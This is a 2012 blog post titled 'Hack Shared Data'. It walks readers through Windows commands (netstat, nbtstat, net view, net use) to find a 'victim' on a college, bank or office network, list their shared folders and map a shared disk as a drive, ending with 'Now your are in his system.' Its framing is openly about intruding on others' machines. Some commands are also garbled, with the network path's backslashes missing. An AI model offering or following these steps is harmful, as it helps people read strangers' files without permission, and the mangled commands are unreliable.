Pages

Friday, March 2, 2012

Hack Shared Data

Step 1
Get IP using netstat command.

Step2
Open a dos prompt by going to start/run
type "cmd" in the run box.Press OK.
this is what u will see:
C:\Documents and Settings\>

c:windows>nbtstat -a 192.168.92.2

U will see:
NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------
If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3
type :
c:windows>net view 192.168.92.2
The Output will be:

Shared resources at 192.168.92.2

Sharename Type Used as Comment

CDISK Disk xxxxx xxxxx
The work is done.
"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4
type down:
replace x: by anything letter you want but not your own drive
letters.(Not compulsory)
CDISK is the name of the shared hard-drive.

c:windows>net use x: 192.168.92.2CDISK

If the command is successful we will get the confirmation.
The command was completed successfully
Now open windows explorer or just double click on the My Computer icon
on your
desktop and you will see a new network drive X:> .

Now your are in his system.


This is only available for local network connection(like in a college,Bank,Office Etc).. And victim must have to shared  data in his PC.
Check out guyz....
Do dis AT your own Risk.....

0 comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...